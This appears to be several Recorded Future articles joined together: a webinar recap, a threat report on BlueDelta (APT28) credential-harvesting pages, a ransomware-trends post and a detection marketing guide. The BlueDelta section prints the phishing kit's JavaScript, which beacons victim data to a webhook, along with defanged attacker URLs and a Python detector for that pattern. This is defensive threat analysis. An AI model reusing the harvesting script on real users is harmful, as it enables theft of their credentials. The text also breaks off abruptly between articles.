Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.
Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.
Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.
But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.
Intelligence as a strategic asset
Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”
Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”
Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”
How threat intelligence delivers organization-wide value
Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.
Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”
Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”
Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”
The anatomy of a mature threat intelligence program
According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.
“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.
Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”
Pathways to advancing maturity
Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”
Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”
Top challenges for CTI teams
The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”
Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.
Looking to the future of threat intelligence
When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.
The analysis cut-off date for this report was September 11, 2025.
Executive Summary
Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.
Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.
BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.
BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.
Key Findings
BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.
Background
BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.
Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.
Technical Analysis
Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.
Microsoft OWA Credential Harvesting
On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.
Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)
BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.
The initial webhook in this campaign differs from those previously reported by Insikt Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.
Figure 2: HTML used to display a PDF lure in the victim's browser (Source: Recorded Future)
The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”
Figure 3: Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)
After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.
As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.
Figure 4: Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)
<script>
// Read the victim's address from the ?u= query-string parameter and pre-fill the username field
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
// Store the current page URL (the webhook itself) in the hidden form element
document.getElementById('href').value = window.location.href;
// "Page-opened" beacon: POST the address as JSON back to the webhook stored above
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
// Rewrite the displayed URL to /owa/ so the address bar resembles a legitimate OWA path
window.history.pushState({}, document.title, '/owa/');
</script>
Figure 5: JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)
The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.
When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.
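As an added, defender-side example (not Recorded Future's code or tooling), the following Python checks codify the behaviour described above: the static traits of the harvesting page from Figures 4 and 5, and the shortener-to-webhook-to-JSON-beacon sequence of the redirection chain, run over proxy-log lines. The proxy-log format and the sample log lines are constructed for this example; the webhook paths are the ones quoted in the analysis.

```python
"""Defender-side checks for the OWA-themed BlueDelta harvesting pattern described above.
Added example, not Recorded Future's code. scan_page_source() looks for the static
traits of Figures 4 and 5; find_beacon_chains() looks for the redirection chain and
JSON beacon in proxy logs. Log format and sample lines are constructed assumptions."""
import re
from collections import defaultdict

# webhook.site endpoints in these campaigns use a UUID path
WEBHOOK_URL_RE = re.compile(
    r"https?://webhook\.site/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# One regex per behaviour the report describes in the page's JavaScript.
SOURCE_TRAITS = {
    # Hidden form element filled with the page's own URL at load (Figure 4)
    "href_from_location": re.compile(
        r"getElementById\(['\"]href['\"]\)\.value\s*=\s*window\.location\.href"),
    # Victim address pre-filled from the ?u= query-string parameter
    "username_from_u_param": re.compile(r"urlParams\.get\(['\"]u['\"]\)"),
    # "page_opened" beacon posted back to the URL held in the hidden element (Figure 5)
    "page_opened_beacon": re.compile(r"page_opened"),
    "post_to_hidden_href": re.compile(
        r"\.open\(['\"]POST['\"]\s*,\s*document\.getElementById\(['\"]href['\"]\)\.value"),
    # Displayed URL rewritten to /owa/ to imitate a legitimate OWA path
    "pushstate_owa": re.compile(r"pushState\([^)]*['\"]/owa/['\"]\s*\)"),
    # Hard-coded exfiltration endpoint on the free webhook.site service
    "webhook_site_url": WEBHOOK_URL_RE,
}


def scan_page_source(html: str) -> list[str]:
    """Return the names of the traits present in a fetched page body (several
    co-occurring traits are what makes the page worth an analyst's review)."""
    return [name for name, rx in SOURCE_TRAITS.items() if rx.search(html)]


# Constructed proxy-log line: "<iso-ts> <client> <METHOD> <url> <status> <content-type>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) (?P<ctype>\S+)$")


def find_beacon_chains(lines: list[str]) -> dict[str, list[str]]:
    """Per client, list the observed stages of the described chain: shorturl.at
    redirect -> first webhook.site page (PDF lure) -> second webhook.site page
    (login form) -> JSON POST beacon to webhook.site. Only clients that
    reached the beacon stage are reported."""
    by_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            by_client[m["client"]].append(m.groupdict())

    findings = {}
    for client, events in by_client.items():
        stages, seen_hooks = [], []
        for ev in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort as text
            url, method = ev["url"], ev["method"]
            hook = WEBHOOK_URL_RE.match(url)  # ignores any ?u= query string
            if method == "GET" and "shorturl.at/" in url.lower() and ev["status"].startswith("3"):
                stages.append("shortener_redirect")
            elif method == "GET" and hook and hook.group(0) not in seen_hooks:
                seen_hooks.append(hook.group(0))  # each distinct webhook is a new stage
                stages.append(f"webhook_page_{len(seen_hooks)}")
            elif method == "POST" and hook and ev["ctype"] == "application/json":
                stages.append("json_beacon_to_webhook")
        if "json_beacon_to_webhook" in stages:
            findings[client] = stages
    return findings


# Constructed sample page body: the script from Figure 5 plus the hidden element from Figure 4.
SAMPLE_HARVESTER_HTML = """
<form><input type="hidden" id="href"><input id="username"><input type="password" id="password"></form>
<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>
"""

# Constructed benign login page with none of the traits.
SAMPLE_BENIGN_HTML = """<form action="/login" method="post"><input id="username"></form>
<script>document.getElementById('username').focus();</script>"""

# Constructed proxy-log lines reproducing the chain (webhook paths are those quoted in the report).
SAMPLE_PROXY_LOG = [
    "2025-02-06T09:14:02 10.1.4.23 GET https://shorturl.at/Be4Xe 302 text/html",
    "2025-02-06T09:14:03 10.1.4.23 GET https://webhook.site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7 200 text/html",
    "2025-02-06T09:14:05 10.1.4.23 GET https://webhook.site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4?u=user@example.com 200 text/html",
    "2025-02-06T09:14:05 10.1.4.23 POST https://webhook.site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4 200 application/json",
    "2025-02-06T09:15:10 10.1.4.77 GET https://outlook.office.com/owa/ 200 text/html",
]
```

Running scan_page_source(SAMPLE_HARVESTER_HTML) reports five of the six traits (the webhook URL itself never appears in the page source because the kit reads it from window.location), while find_beacon_chains(SAMPLE_PROXY_LOG) reports the full four-stage chain for 10.1.4.23 only.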
Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.
The ransomware paradox: More attacks, less money
By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.
For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.
This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.
Trend 1: DDoS services return to the RaaS model
With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.
The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.
What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.
Trend 2: Insider recruitment attempts are accelerating
Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.
The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.
What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.
Trend 3: Gig workers as unwitting attack vectors
According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.
The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms mean other groups could replicate this approach with minimal effort.
What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.
Looking ahead: One big prediction for 2026
The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.
Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.
The bottom line: Strengthen your ransomware defenses
Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:
Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.
Why Digital Threat Detection Requires a New Approach
Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:
High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
Alert fatigue from manually sifting through noise to find high-risk signals.
As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.
Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.
The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.
Leaked credentials and account takeover attempts (stolen identities)
Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.
Brand impersonation, domain spoofing, and phishing campaigns
Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.
Vulnerability exploitation and zero-day threats in the external attack surface
Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.
Dark web chatter and early warning signs of planned ransomware or DDoS attacks
Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.
Why an Intelligence-Driven Approach is Better
For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.
Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors, infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.
The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.
Essential Digital Threat Detection Tools and Technologies
Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.
Threat Intelligence Platforms: The Engines of Context
No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.
Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:
Open web reporting
Underground forums
Dark web marketplaces
Malware sandboxes
Threat feeds
Researcher data
Once the data is normalized, the platform enriches it with context, such as:
Relationships between indicators
Associations with known threat actors
Infrastructure reuse
Activity targeting specific industries or regions
This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.
Security Orchestration, Automation, and Response (SOAR)
While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.
Key SOAR capabilities include:
Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
Initiating takedown workflows for harmful domains or impersonation infrastructure
Coordinating actions across multiple security tools to ensure a unified response
Documenting each step of the investigation for reporting and compliance
By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.
Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration
EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.
EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.
Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.
Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.
Overcoming the Analyst’s Biggest Pain Points
Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.
The Drain of Alert Fatigue and False Positives
High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.
The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.
The Blind Spots of External Risk
Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.
These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.
Recorded Future: Operationalizing Digital Threat Intelligence at Scale
Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.
Real-Time Context from the Intelligence GraphⓇ
The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:
Open web
Dark web marketplaces
Malware repositories
Technical feeds
Network telemetry
Closed underground forums
No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence Graph® solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.
Comprehensive Digital Risk Protection for External Threats
Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.
Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.
Accelerating Time-to-Action through Integrated Intelligence
Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.
An extensive ecosystem of pre-built integrations and flexible APIs connects directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.
Collective Insights® adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.
This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.
Smarter, Faster Security Decisions
Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.
By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.
These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.
Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.
The analysis cut-off date for this report was July 30, 2025.
Executive Summary
Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.
Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript described in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.
BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.
Key Findings
BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.
Background
